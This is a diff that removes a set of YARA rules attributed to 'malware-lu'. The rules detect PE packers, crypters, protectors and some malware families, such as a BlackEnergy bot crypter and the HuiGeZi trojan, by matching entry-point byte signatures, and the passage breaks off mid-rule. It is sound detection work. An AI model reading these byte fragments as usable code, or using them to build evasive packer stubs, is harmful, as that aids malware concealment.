-	
-rule RJoiner12byVaska250320071658
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 0C 02 00 00 8D 85 F4 FD FF FF 56 50 68 04 01 00 00 FF 15 14 10 40 00 90 8D 85 F4 FD FF FF 50 FF 15 10 10 40 00 90 BE 00 20 40 00 90 83 3E FF 0F 84 84 00 00 00 53 57 33 FF 8D 46 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Minke101byCodius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 ?? ?? ?? ?? ?? 10 E8 7A F6 FF FF BE 68 66 00 10 33 C0 55 68 DB 40 00 10 64 FF 30 64 89 20 E8 FA F8 FF FF BA EC 40 00 10 8B C6 E8 F2 FA FF FF 8B D8 B8 6C 66 00 10 8B 16 E8 88 F2 FF FF B8 6C 66 00 10 E8 76 F2 FF FF 8B D0 8B C3 8B 0E E8 E3 E4 FF FF E8 2A F9 FF FF E8 C1 F8 FF FF B8 6C 66 00 10 8B 16 E8 6D FA FF FF E8 14 F9 FF FF E8 AB F8 FF FF 8B 06 E8 B8 E3 FF FF 8B D8 B8 6C 66 00 10 E8 38 F2 FF FF 8B D3 8B 0E E8 A7 E4 FF ?? ?? ?? ?? C4 FB FF FF E8 E7 F8 FF FF 8B C3 E8 B0 E3 FF FF E8 DB F8 FF FF 33 C0 5A 59 59 64 89 10 68 E2 40 00 10 C3 E9 50 EB FF FF EB F8 5E 5B E8 BB EF FF FF 00 00 00 43 41 31 38 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrypWrapvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 B8 ?? ?? ?? E8 90 02 ?? ?? 83 F8 ?? 75 07 6A ?? E8 ?? ?? ?? ?? FF 15 49 8F 40 ?? A9 ?? ?? ?? 80 74 0E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WarningmaybeSimbyOZpolycryptorby3xpl01tver2xx250320072200
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 57 57 8D 7C 24 04 50 B8 00 D0 17 13 AB 58 5F C3 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WARNINGTROJANHuiGeZi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 C4 ?? FE FF FF 53 56 57 33 C0 89 85 ?? FE FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeyodascryptor12emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC 90 2C 8A C0 C0 78 90 04 62 EB 01 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EPv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 83 C0 17 8B F0 97 33 C0 33 C9 B1 24 AC 86 C4 AC AA 86 C4 AA E2 F6 00 B8 40 00 03 00 3C 40 D2 33 8B 66 14 50 70 8B 8D 34 02 44 8B 18 10 48 70 03 BA 0C ?? ?? ?? ?? C0 33 FE 8B 30 AC 30 D0 C1 F0 10 C2 D0 30 F0 30 C2 C1 AA 10 42 42 CA C1 E2 04 5F E9 5E B1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule D1S1Gv11betaD1N
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 ?? ?? 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule PROPACKv208
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C D3 8E C3 8C CA 8E DA 8B 0E ?? ?? 8B F1 83 ?? ?? 8B FE D1 ?? FD F3 A5 53 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BlackEnergyDDoSBotCrypter
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 ?? ?? 81 EC 1C 01 00 00 53 56 57 6A 04 BE 00 30 00 00 56 FF 35 00 20 11 13 6A 00 E8 ?? 03 00 00 ?? ?? 83 C4 10 ?? FF 89 7D F4 0F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HACKSTOPv113
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 B8 ?? ?? 1E CD 21 86 E0 3D ?? ?? 73 ?? CD 20 0E 1F B4 09 E8 ?? ?? 24 ?? EA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoiner151GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 87 FF 90 90 B9 2B 00 00 00 BA 07 10 40 00 83 C2 03 90 87 FF 90 90 B9 04 00 00 00 90 87 FF 90 33 C9 C7 05 09 30 40 00 00 00 00 00 68 00 01 00 00 68 21 30 40 00 6A 00 E8 B7 02 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 68 21 30 40 00 E8 8F 02 00 00 A3 19 30 40 00 90 87 FF 90 8B 15 09 30 40 00 81 C2 04 01 00 00 F7 DA 6A 02 6A 00 52 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PeXv099EngbartCrackPl
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HACKSTOPv119
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? D6 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HACKSTOPv118
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? FD 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv200b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 2D ?? ?? 8E D0 51 2D ?? ?? 8E C0 50 B9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv200c
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 B8 ?? ?? BA ?? ?? 3B C4 73 ?? 8B C4 2D ?? ?? 25 ?? ?? 8B F8 B9 ?? ?? BE ?? ?? FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeNeolite20emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 A6 00 00 00 B0 7B 40 00 78 60 40 00 7C 60 40 00 00 00 00 00 B0 3F 00 00 12 62 40 00 4E 65 6F 4C 69 74 65 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 43 6F 6D 70 72 65 73 73 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 2C 31 39 39 39 20 4E 65 6F 57 6F 72 78 20 49 6E 63 0D 0A 50 6F 72 74 69 6F 6E 73 20 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 37 2D 31 39 39 39 20 4C 65 65 20 48 61 73 69 75 6B 0D 0A 41 6C 6C 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2E 00 00 00 00 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv300v301Relocationspack
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? BA ?? ?? BF ?? ?? B9 ?? ?? 8C CD 8E DD 81 ED ?? ?? 06 06 8B DD 2B DA 8B D3 FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02CodeSafe20Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02ZCode101Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxCaz1204
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 83 EE 03 1E 06 B8 FF FF CD 2F 3C 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ZealPack10Zeal
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C7 45 F4 00 00 40 00 C7 45 F0 ?? ?? ?? ?? 8B 45 F4 05 ?? ?? ?? ?? 89 45 F4 C7 45 FC 00 00 00 00 EB 09 8B 4D FC 83 C1 01 89 4D FC 8B 55 FC 3B 55 F0 7D 22 8B 45 F4 03 45 FC 8A 08 88 4D F8 0F BE 55 F8 83 F2 0F 88 55 F8 8B 45 F4 03 45 FC 8A 4D F8 88 08 EB CD FF 65 F4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CPAV
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 4D 5A B1 01 93 01 00 00 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117iBoxLZMAAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 67 30 00 00 8D 9D 66 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule INCrypter03INinYbyz3e_NiFe
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8D 58 20 C7 03 00 00 00 00 E8 00 00 00 00 5D 81 ED 4D 16 40 00 8B 9D 0E 17 40 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 83 F8 01 75 05 03 DB C1 CB 10 8B 8D 12 17 40 00 8B B5 06 17 40 00 51 81 3E 2E 72 73 72 74 65 8B 85 16 17 40 00 E8 23 00 00 00 8B 85 1A 17 40 00 E8 18 00 00 00 8B 85 1E 17 40 00 E8 0D 00 00 00 8B 85 22 17 40 00 E8 02 00 00 00 EB 18 8B D6 3B 46 0C 72 0A 83 F9 01 74 0B 3B 46 34 72 06 BA 00 00 00 00 C3 58 83 FA 00 75 1A 8B 4E 10 8B 7E 0C 03 BD 02 17 40 00 83 F9 00 74 09 F6 17 31 0F 31 1F 47 E2 F7 59 83 C6 28 49 83 F9 00 75 88 8B 85 0A 17 40 00 89 44 24 1C 61 50 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule MorphineV27Holy_FatherRatter29A
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 }
-
-condition:
-		$a0
-}
-	
-	
-rule nBinderv361
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C 00 5C 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C }
-
-condition:
-		$a0
-}
-	
-	
-rule MatrixDongleTDiGmbH
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 E8 B6 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? E8 00 00 00 00 5B 2B D9 8B F8 8B 4C 24 2C 33 C0 2B CF F2 AA 8B 3C 24 8B 0A 2B CF 89 5C 24 20 80 37 A2 47 49 75 F9 8D 64 24 04 FF 64 24 FC 60 C7 42 08 ?? ?? ?? ?? E8 C5 FF FF FF C3 C2 F7 29 4E 29 5A 29 E6 86 8A 89 63 5C A2 65 E2 A3 A2 }
-	$a1 = { E8 00 00 00 00 E8 00 00 00 00 59 5A 2B CA 2B D1 E8 1A FF FF FF }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule NullsoftInstallSystemv20RC2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 10 53 55 56 57 C7 44 24 14 70 92 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule UnoPiX075BaGiE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 07 00 00 00 61 68 ?? ?? 40 00 C3 83 04 24 18 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 61 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4UnextractablePasswordchecking
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 80 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtBorlandDelphi20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Reg2Exe225byJanVorel
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 68 00 00 00 68 00 00 00 00 68 70 7D 40 00 E8 AE 20 00 00 83 C4 0C 68 00 00 00 00 E8 AF 52 00 00 A3 74 7D 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 9C 52 00 00 A3 70 7D 40 00 E8 24 50 00 00 E8 E2 48 00 00 E8 44 34 00 00 E8 54 28 00 00 E8 98 27 00 00 E8 93 20 00 00 68 01 00 00 00 68 D0 7D 40 00 68 00 00 00 00 8B 15 D0 7D 40 00 E8 89 8F 00 00 B8 00 00 10 00 68 01 00 00 00 E8 9A 8F 00 00 FF 35 A4 7F 40 00 68 00 01 00 00 E8 3A 23 00 00 8D 0D A8 7D 40 00 5A E8 5E 1F 00 00 FF 35 A8 7D 40 00 68 00 01 00 00 E8 2A 52 00 00 A3 B4 7D 40 00 FF 35 A4 7F 40 00 FF 35 B4 7D 40 00 FF 35 A8 7D 40 00 E8 5C 0C 00 00 8D 0D A0 7D 40 00 5A E8 26 1F 00 00 FF 35 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov420SiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 F8 8E 4C 00 68 F0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 84 A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 80 A5 4C 00 C1 E1 08 03 CA 89 0D 7C A5 4C 00 C1 E8 10 A3 78 A5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DalKrypt10byDalKiT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 10 40 00 58 68 ?? ?? ?? 00 5F 33 DB EB 0D 8A 14 03 80 EA 07 80 F2 04 88 14 03 43 81 FB ?? ?? ?? 00 72 EB FF E7 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv15Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor239compressedresources
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 51 68 ?? ?? ?? ?? 59 81 F1 12 3C CB 98 E9 53 2C 00 00 F7 D7 E9 EB 60 00 00 83 45 F8 02 E9 E3 36 00 00 F6 45 F8 20 0F 84 1E 21 00 00 55 E9 80 62 00 00 87 0C 24 8B E9 ?? ?? ?? ?? 00 00 23 C1 81 E9 ?? ?? ?? ?? 57 E9 ED 00 00 00 0F 88 ?? ?? ?? ?? E9 2C 0D 00 00 81 ED BB 43 CB 79 C1 E0 1C E9 9E 14 00 00 0B 15 ?? ?? ?? ?? 81 E2 2A 70 7F 49 81 C2 9D 83 12 3B E8 0C 50 00 00 E9 A0 16 00 00 59 5B C3 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 41 42 00 00 E9 93 33 00 00 31 DB 89 D8 59 5B C3 A1 ?? ?? ?? ?? 8A 00 2C 99 E9 82 30 00 00 0F 8A ?? ?? ?? ?? B8 01 00 00 00 31 D2 0F A2 25 FF 0F 00 00 E9 72 21 00 00 0F 86 57 0B 00 00 E9 ?? ?? ?? ?? C1 C0 03 E8 F0 36 00 00 E9 41 0A 00 00 81 F7 B3 6E 85 EA 81 C7 ?? ?? ?? ?? 87 3C 24 E9 74 52 00 00 0F 8E ?? ?? ?? ?? E8 5E 37 00 00 68 B1 74 96 13 5A E9 A1 04 00 00 81 D1 49 C0 12 27 E9 50 4E 00 00 C1 C8 1B 1B C3 81 E1 96 36 E5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule GameGuardv20065xxexesignbyhot_UNP
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EnigmaProtectorv112LITE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv01emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 }
-	$a1 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule Apex_cbeta500mhz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtector11A12vcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F 32 30 30 35 5F 33 5F 31 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule codeCrypter031
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 58 53 5B 90 BB ?? ?? 40 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC }
-
-condition:
-		$a0
-}
-	
-	
-rule PKTINYv10withTINYPROGv38
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakePESHiELD2xFEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEditionV11Xap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 10 }
-
-condition:
-		$a0
-}
-	
-	
-rule Excalibur103forgot
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack118DllaPlib043ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 5C 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01MicrosoftVisualC50MFCAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Pohernah101byKas
-{
-      meta:
-		author="malware-lu"
-strings:
